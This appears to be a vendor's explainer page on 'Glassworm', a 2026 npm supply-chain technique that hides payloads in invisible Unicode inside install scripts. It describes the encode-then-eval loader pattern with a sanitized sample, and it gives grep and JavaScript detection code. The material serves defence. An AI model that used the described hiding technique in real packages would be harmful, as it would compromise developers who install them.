Glassworm

npm · supply chain · 2026
Definition

Glassworm is a supply chain attack technique in which malicious code is carried by invisible Unicode characters (zero-width spaces, variation selectors and other non-printing code points) inside package.json scripts or source files. Because the characters do not render, the file looks normal in text editors and code review. The interpreter, however, treats them as ordinary characters: a short, innocuous-looking loader reads the invisible characters back out of a string, decodes them into code, and executes it.

How it works

Editors, diff viewers and most terminals draw zero-width characters such as U+200B (zero-width space) as nothing at all, so they do not change how a line looks. JavaScript and the shell, on the other hand, do not treat them as whitespace or as separators; they are ordinary characters that can sit inside a string literal, an identifier or a command-line argument. That gives an attacker two things: a string that appears empty or short in the editor but actually holds thousands of code points, and a way to encode arbitrary bytes in it (for example, one variation selector per nibble of the payload). A few visible lines of what looks like configuration parsing then decode that string and hand the result to eval or new Function. The reviewer sees a harmless-looking decoder and an empty string. Note that an invisible character cannot hide visible text that follows it; what it hides is its own presence and the data it encodes.

What it looks like

What you see in package.json:

"postinstall": "node setup.js"

What you see in setup.js:

const cfg = "";

What's actually in setup.js (revealed in a hex editor, or by grepping for non-printing code points):

const cfg = "<U+FE00><U+FE0B><U+FE05><U+FE0D>…";

The quotes hold hundreds of variation selectors, written here as <U+…> because they have no glyph. Nothing in package.json is hidden; postinstall is exactly what it looks like. The hidden part is the string: it renders as "" but carries an encoded second stage, which the remaining lines of setup.js decode and run during install, with nothing visible in the diff.

The 2026 Glassworm campaign

In March 2026, security researchers identified the Glassworm campaign — a coordinated attack using this technique against npm packages targeting developer workstations. Affected packages installed a multi-stage RAT (Remote Access Trojan) that force-installed a malicious Chrome extension to log keystrokes and steal session cookies.

The campaign was notable because the standard tools did not look for it. npm audit and Dependabot match package versions against advisory databases, so a package nobody has reported yet is clean by definition; most static analysis tools work on the parsed token stream, where a string of invisible characters is just a valid string literal. None of them checked for non-printing Unicode in scripts or source.

How to detect Glassworm

PackageFix scans every field in your manifest for non-printable Unicode characters before running any vulnerability checks. If invisible characters are found, you get an immediate red banner: "Invisible Unicode characters detected in this manifest — do not use it." The scan stops and the manifest is flagged as potentially compromised.

You can also check manually in your terminal:

grep -nP '[\x{200B}-\x{200D}\x{2060}\x{FEFF}\x{FE00}-\x{FE0F}]' package.json

grep -P needs a UTF-8 locale (for example LC_ALL=C.UTF-8) for the \x{...} code points to match; any hit is a line number worth opening in a hex editor. cat -A package.json is a fallback that shows the raw bytes, with U+200B appearing as M-bM-^@M-^K (its UTF-8 encoding E2 80 8B).
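A scanner along the lines the page describes, written here as an added JavaScript example rather than PackageFix's own implementation. The two manifests are constructed for the demo, and the choice of character ranges is the editor's; in particular it is deliberately strict and will flag a zero-width joiner inside an emoji sequence in a description, which should be reviewed rather than silently allowed.

```javascript
// Added example, not the page's or PackageFix's code: flag non-printing
// Unicode anywhere in a manifest before anything is installed or run.

// "Invisible" here means Unicode format characters (\p{Cf}: zero-width
// space/joiner/non-joiner, U+FEFF, bidi controls, ...) plus the variation
// selectors (U+FE00..U+FE0F and U+E0100..U+E01EF), which are combining marks
// rather than Cf and so have to be listed explicitly.
const INVISIBLE = /[\p{Cf}\u{FE00}-\u{FE0F}\u{E0100}-\u{E01EF}]/u;

// Return every invisible code point with its 1-based line and column.
function findInvisible(text) {
  const findings = [];
  const lines = text.split("\n");
  for (let i = 0; i < lines.length; i++) {
    let col = 0;
    for (const ch of lines[i]) { // iterate by code point, not UTF-16 unit
      col++;
      if (INVISIBLE.test(ch)) {
        const hex = ch.codePointAt(0).toString(16).toUpperCase().padStart(4, "0");
        findings.push({ line: i + 1, col, codePoint: "U+" + hex });
      }
    }
  }
  return findings;
}

// Gate: refuse to go any further if anything invisible is present.
function scanManifest(text) {
  const findings = findInvisible(text);
  return { ok: findings.length === 0, findings };
}

// Name the affected fields by walking the parsed object. An invisible byte
// outside a string makes JSON.parse throw, which is itself a finding.
function taintedFields(text) {
  let obj;
  try { obj = JSON.parse(text); } catch { return ["<not valid JSON>"]; }
  const paths = [];
  const walk = (node, path) => {
    if (typeof node === "string") { if (INVISIBLE.test(node)) paths.push(path); return; }
    if (node && typeof node === "object") {
      for (const [k, v] of Object.entries(node)) {
        const p = path ? path + "." + k : k;
        if (INVISIBLE.test(k)) paths.push(p + " (key)");
        walk(v, p);
      }
    }
  };
  walk(obj, "");
  return paths;
}

// Constructed sample manifests: one clean, one with variation selectors in
// the description and a zero-width space inside the postinstall script.
const cleanManifest =
  '{\n' +
  '  "name": "demo",\n' +
  '  "scripts": { "postinstall": "node setup.js" }\n' +
  '}\n';

const taintedManifest =
  '{\n' +
  '  "name": "demo",\n' +
  '  "description": "utils\uFE00\uFE0B\uFE02",\n' +
  '  "scripts": { "postinstall": "node\u200B setup.js" }\n' +
  '}\n';

console.log("clean:", scanManifest(cleanManifest));
console.log("tainted:", scanManifest(taintedManifest));
console.log("fields:", taintedFields(taintedManifest));
```

Run the raw-text scan before JSON.parse, not instead of it: the raw scan gives line and column for every hit regardless of where it sits, and the field walk then tells the reviewer which value to open.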

Check your dependencies for CVEs, CISA KEV entries, and supply chain risks.

Open PackageFix →

Free · No signup · No CLI · Runs in your browser

Common questions

Which Unicode characters does Glassworm use?
The most commonly used are: U+200B (zero-width space), U+200C (zero-width non-joiner), U+200D (zero-width joiner), U+FEFF (zero-width no-break space / BOM), and the variation selectors U+FE00-U+FE0F, with the supplementary block U+E0100-U+E01EF giving an attacker 256 distinct invisible code points, enough to encode one full byte each. All are invisible in most text editors and terminals.
Does GitHub's code review catch Glassworm?
GitHub's UI doesn't render these characters either. Its file and diff views do show a warning when a file contains hidden or bidirectional Unicode characters, but the warning is advisory, nothing blocks the merge, and a reviewer reading the diff in an IDE or a notification email never sees it. Code review alone is not reliable protection; automated scanning is required.
Is Glassworm only an npm problem?
The technique applies to any ecosystem that runs code during install: npm's lifecycle scripts, Python's setup.py, Ruby gems that build native extensions through extconf.rb. npm is the most common target because postinstall runs automatically on npm install with no prompt, unless scripts are disabled with --ignore-scripts or ignore-scripts=true in .npmrc.
How is Glassworm different from obfuscated code?
Obfuscated code is visible but hard to read; it's there, just confusing, and a reviewer at least knows something is being hidden. Glassworm code is literally invisible: it renders as nothing, yet the interpreter treats it as ordinary characters that a small loader turns back into real commands. Standard code review and most static analysis tools reason about the characters they can see or the tokens they parse, and a string of non-printing code points is, to both, just an unremarkable string.
